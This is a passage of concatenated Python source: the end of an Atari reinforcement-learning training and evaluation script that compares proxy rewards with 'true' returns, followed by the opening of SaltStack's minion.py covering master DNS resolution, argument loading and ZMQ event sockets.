env.observation_space.shape, env.action_space.n, num_layers=flags.num_layers, hidden_size=flags.hidden_size, use_lstm=flags.use_lstm
).to(device=flags.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
# optimizer = torch.optim.Adam(
# learner_model.parameters(),
# lr=flags.learning_rate,
# )
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
def drop_lambda(epoch):
left = 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
return 2 ** (-5 + (left * 10) // 2)
def staggered_drop_lambda(epoch):
TOTAL = 100_000_000
left = 1 - min(epoch * T * B, TOTAL) / TOTAL
if left > 0.9:
return 2 ** -1
if left > 0.7:
return 2 ** -2
if left > 0.5:
return 2 ** -3
if left > 0.3:
return 2 ** -4
return 2 ** -5 * (left/0.3)
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, staggered_drop_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"mean_episode_true_return",
"mean_episode_true_move",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal step, stats
timings = prof.Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
stats = learn(
flags, model, learner_model, batch, agent_state, optimizer, scheduler
)
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
def checkpoint():
if flags.disable_checkpoint:
return
logging.info("Saving checkpoint to %s", checkpointpath)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"flags": vars(flags),
},
checkpointpath,
)
#wandb.init(project="test-space", entity="aypan17", group="atari")
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
if timer() - last_checkpoint_time > 10 * 60: # Save every 10 min.
checkpoint()
last_checkpoint_time = timer()
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
if stats.get("episode_true_returns", None):
mean_true_return = (
"True return per episode: %.1f. " % stats["mean_episode_true_return"]
)
else:
mean_true_return = ""
if stats.get("episode_true_move", None):
mean_true_move = (
"True move per episode: %.1f. " % stats["mean_episode_true_move"]
)
else:
mean_true_move = ""
total_loss = stats.get("total_loss", float("inf"))
#if stats.get("episode_returns", None) and stats.get("true_episode_returns", None):
#wandb.log({"loss":total_loss, "episode_return": stats["mean_episode_return"], "true_episode_return": stats["mean_episode_true_return"]})
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %s%s%sStats:\n%s",
step,
sps,
total_loss,
mean_return,
mean_true_return,
mean_true_move,
pprint.pformat(stats),
)
except KeyboardInterrupt:
return # Try joining actors then quit.
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
checkpoint()
plogger.close()
def evaluate(flags, num_episodes: int = 4):
for folder in os.listdir(flags.savedir):
if not os.path.isdir(os.path.join(flags.savedir, folder)):
continue
params = folder.split("_")
if ("staggered" not in params and "pacifist" not in params) or len(params) < 3:
continue
test(flags, num_episodes=num_episodes, folder=folder, num_layers=int(params[-1]), hidden_size=int(params[-2]))
def test(flags, num_episodes: int = 4, folder = None, num_layers = None, hidden_size = None):
if folder is not None:
assert num_layers is not None
assert hidden_size is not None
elif flags.xpid is None:
assert False
checkpointpath = "./latest/model.tar"
else:
folder = flags.xpid
num_layers = flags.num_layers
hidden_size = flags.hidden_size
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, folder, "model.tar"))
)
if flags.pretrained:
gym_env = create_env_seaquest(flags)
env = environment.Environment(gym_env)
model = FNet(gym_env.observation_space.shape, gym_env.action_space.n, num_layers=num_layers, hidden_size=hidden_size, use_lstm=flags.use_lstm)
else:
gym_env = create_env(flags)
env = environment.Environment(gym_env)
model = Net(gym_env.observation_space.shape, gym_env.action_space.n, num_layers=num_layers, hidden_size=hidden_size, use_lstm=flags.use_lstm)
env._max_episode_steps = 10
model.eval()
p = sum(p.numel() for p in model.fc.parameters())# if p.requires_grad)
#print([p.size() for p in model.fc.parameters()])
#print(model.fc)
#assert False
try:
checkpoint = torch.load(checkpointpath, map_location="cpu")
model.load_state_dict(checkpoint["model_state_dict"])
except:
print(f"Model of width {hidden_size} and depth {num_layers} failed to load")
return
returns = []
true_returns = []
true_move = []
lens = []
for i in range(15):
tmp_ret = []
tmp_true = []
tmp_move = []
tmp_lens = []
observation = env.initial()
agent_state = model.initial_state(batch_size=1)
while len(tmp_ret) < num_episodes:
if flags.mode == "test_render":
env.gym_env.render()
agent_outputs = model(observation, agent_state)
policy_outputs, agent_state = agent_outputs
observation = env.step(policy_outputs["action"])
if observation["done"].item():
tmp_ret.append(observation["episode_return"].item())
tmp_true.append(observation["episode_true_return"].item())
tmp_move.append(observation["episode_true_move"].item())
tmp_lens.append(observation["episode_step"].item())
# logging.info(
# "Episode ended after %d steps. Return: %.1f. True return: %.1f. True move: %.1f. Return per step: %.1f. True return per step: %.1f",
# observation["episode_step"].item(),
# observation["episode_return"].item(),
# observation["episode_true_return"].item(),
# observation["episode_true_move"].item(),
# observation["episode_return"].item() / observation["episode_step"].item(),
# observation["episode_true_return"].item() / observation["episode_step"].item()
# )
logging.info(str(tmp_lens))
returns.append(sum(tmp_ret))
true_returns.append(sum(tmp_true))
true_move.append(sum(tmp_move))
lens.append(sum(tmp_lens))
env.close()
lens = np.array(lens)
returns = np.array(returns)
true_returns = np.array(true_returns)
true_move = np.array(true_move)
return_per_step = returns / lens
true_return_per_step = true_returns / lens
logging.info(
"Average returns over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(returns).item(), np.std(returns).item()
)
logging.info(
"Average true returns over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(true_returns).item(), np.std(true_returns).item()
)
logging.info(
"Average true move over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(true_move).item(), np.std(true_move).item()
)
logging.info(
"Average return/step over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(return_per_step).item(), np.std(return_per_step).item()
)
logging.info(
"Average true return/step over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(true_return_per_step).item(), np.std(true_return_per_step).item()
)
logging.info(
"Average num steps over %i episodes: %.1f +/- %.1f", num_episodes, np.mean(lens).item(), np.std(lens).item()
)
f = open(os.path.join(flags.savedir, folder+"_"+flags.xpid+".json"), "w")
json.dump({'params': [p], 'rew': returns.tolist(), 'true_rew': true_returns.tolist(), 'true_move': true_move.tolist(),
'rew_step': return_per_step.tolist(), 'true_rew_step': true_return_per_step.tolist(), 'len':lens.tolist()}, f)
f.close()
class FeaturizedAtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, num_layers=1, hidden_size=512, use_lstm=False):
super(FeaturizedAtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction
self.conv1 = nn.Conv2d(self.observation_shape[0], 32, 5, stride=1, padding=2)
self.maxp1 = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(32, 32, 5, stride=1, padding=1)
self.maxp2 = nn.MaxPool2d(2, 2)
self.conv3 = nn.Conv2d(32, 64, 4, stride=1, padding=1)
self.maxp3 = nn.MaxPool2d(2, 2)
self.conv4 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self.maxp4 = nn.MaxPool2d(2, 2)
# Fully connected layer.
self.fc = nn.ModuleList([nn.Linear(1024, hidden_size)] + [nn.Linear(hidden_size, hidden_size)] * (num_layers-1))
# FC output size + one-hot of last action + last reward.
core_output_size = hidden_size + num_actions + 1
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
return tuple()
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1).float() # Merge time and batch.
x = F.relu(self.maxp1(self.conv1(x)))
x = F.relu(self.maxp2(self.conv2(x)))
x = F.relu(self.maxp3(self.conv3(x)))
x = F.relu(self.maxp4(self.conv4(x)))
x = x.view(T * B, -1)
for layer in self.fc:
x = F.relu(layer(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
def load_my_state_dict(self, state_dict):
own_state = self.state_dict()
for name, param in state_dict.items():
if name not in own_state:
continue
own_state[name].copy_(param)
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, num_layers=1, hidden_size=512, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.ModuleList([nn.Linear(3136, hidden_size)] + [nn.Linear(hidden_size, hidden_size) for _ in range(num_layers-1)])
# FC output size + one-hot of last action + last reward.
core_output_size = hidden_size + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
for layer in self.fc:
x = F.relu(layer(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = (~inputs["done"]).float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
Net = AtariNet
FNet = FeaturizedAtariNet
def create_env(flags):
return atari_wrappers.wrap_pytorch(
atari_wrappers.wrap_deepmind(
atari_wrappers.make_atari(flags.env),
clip_rewards=False,
frame_stack=True,
scale=False,
fuel_multiplier=flags.fuel_multiplier,
move_penalty=flags.move_penalty,
true_move_penalty=flags.true_move_penalty,
)
)
def create_env_seaquest(flags):
return atari_wrappers.wrap_pytorch(
atari_wrappers.wrap_deepmind(
atari_wrappers.make_atari(flags.env),
clip_rewards=False,
frame_stack=False,
scale=False,
fuel_multiplier=flags.fuel_multiplier,
move_penalty=flags.move_penalty,
true_move_penalty=flags.true_move_penalty,
)
)
def main(flags):
if flags.mode == "train":
train(flags)
elif flags.mode == "eval":
evaluate(flags, num_episodes=flags.num_episodes)
else:
test(flags, num_episodes=flags.num_episodes)
if __name__ == "__main__":
flags = parser.parse_args()
main(flags)
|
minion.py | # -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import errno
import types
import signal
import fnmatch
import hashlib
import logging
import threading
import traceback
import multiprocessing
from random import randint, shuffle
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
from stat import S_IMODE
from stat import S_IMODE
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit, SaltSyndicMasterError
)
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in string_kwarg.iteritems():
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules(initial_load=True)
else:
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment']
).compile_pillar()
self.functions = salt.loader.minion_mods(self.opts, include_errors=True)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
self._init_context_and_poller()
hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
# Only use the first 10 chars to keep longer hashes from exceeding the
# max socket path length.
id_hash = hash_type(self.opts['id']).hexdigest()[:10]
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epull_uri)
log.debug(
'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0o177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.functions = salt.loader.minion_mods(
self.opts,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def minions(self):
'''
Return a dict of minion generators bound to the tune_in method
dict of master -> minion_mapping, the mapping contains:
opts: options used to create the minion
last: last auth attempt time
auth_wait: time to wait for next auth attempt
minion: minion object
generator: generator function (non-blocking tune_in)
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
ret = {}
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
ret[master] = {'opts': s_opts,
'last': time.time(),
'auth_wait': s_opts['acceptance_wait_time']}
try:
minion = Minion(s_opts, self.MINION_CONNECT_TIMEOUT, False)
ret[master]['minion'] = minion
ret[master]['generator'] = minion.tune_in_no_block()
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(master))
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
auth_wait = self.opts['acceptance_wait_time']
max_wait = self.opts['acceptance_wait_time_max']
while True:
package = None
for minion in six.itervalues(minions):
if isinstance(minion, dict):
minion = minion['minion']
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
package = self.epull_sock.recv(zmq.NOBLOCK)
except Exception:
pass
masters = list(minions.keys())
shuffle(masters)
# Do stuff per minion that we have
for master in masters:
minion = minions[master]
# if we haven't connected yet, lets attempt some more.
# make sure to keep separate auth_wait times, since these
# are separate masters
if 'generator' not in minion:
if time.time() - minion['auth_wait'] > minion['last']:
minion['last'] = time.time()
if minion['auth_wait'] < max_wait:
minion['auth_wait'] += auth_wait
try:
t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
minions[master]['auth_wait'] = self.opts['acceptance_wait_time']
except SaltClientError:
log.error('Error while bring up minion for multi-master. Is master {0} responding?'.format(master))
continue
else:
continue
# run scheduled jobs if you have them
loop_interval = self.process_schedule(minion['minion'], loop_interval)
# If a minion instance receives event, handle the event on all
# instances
if package:
try:
for master in masters:
minions[master].handle_event(package)
except Exception:
pass
finally:
package = None
# have the Minion class run anything it has to run
next(minion['generator'])
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
self.win_proc = []
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
opts['grains'] = salt.loader.grains(opts)
# evaluate the master to connect to and authenticate with it
opts['master'] = self.eval_master(opts,
timeout,
safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(opts, self.functions)
uid = salt.utils.get_uid(user=opts.get('user', None))
self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
